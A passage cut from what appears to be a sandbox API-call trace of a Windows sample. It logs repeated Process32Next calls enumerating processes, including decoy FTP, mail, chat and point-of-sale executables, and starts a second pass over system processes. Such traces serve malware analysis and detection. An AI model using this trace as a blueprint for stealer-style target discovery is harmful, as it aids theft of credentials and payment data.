th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0243.382] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0243.383] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0243.384] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0243.386] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0243.390] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0243.391] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0243.393] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0243.394] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0243.396] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0243.397] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0243.398] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0243.400] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0243.401] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0243.406] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0243.408] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0243.410] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0243.411] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0243.413] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0243.415] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0243.417] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0243.430] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0243.434] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0243.436] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0243.438] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0243.440] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0243.441] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0243.443] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0243.445] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0243.446] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0243.448] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0243.481] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0243.483] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0243.485] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0243.486] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0243.488] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0243.490] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0243.491] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0243.493] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0243.494] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0243.548] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0243.550] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0243.551] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0243.553] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0243.554] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0243.556] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0243.557] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0243.562] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0243.563] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0243.565] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0243.566] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0243.568] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0243.569] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0243.570] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0243.572] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0243.573] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0243.577] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0243.578] CloseHandle (hObject=0x17b0) returned 1 [0243.578] Sleep (dwMilliseconds=0x64) [0243.725] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0243.741] Process32First (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0243.742] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0243.744] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0243.746] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0243.750] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0243.752] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0243.753] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0243.755] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0243.756] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0243.758] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.759] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.760] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0243.786] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.788] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.789] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.791] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.792] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.794] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.798] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.800] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0243.801] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0243.803] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0243.805] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.806] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0243.808] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0243.815] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0243.817] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: 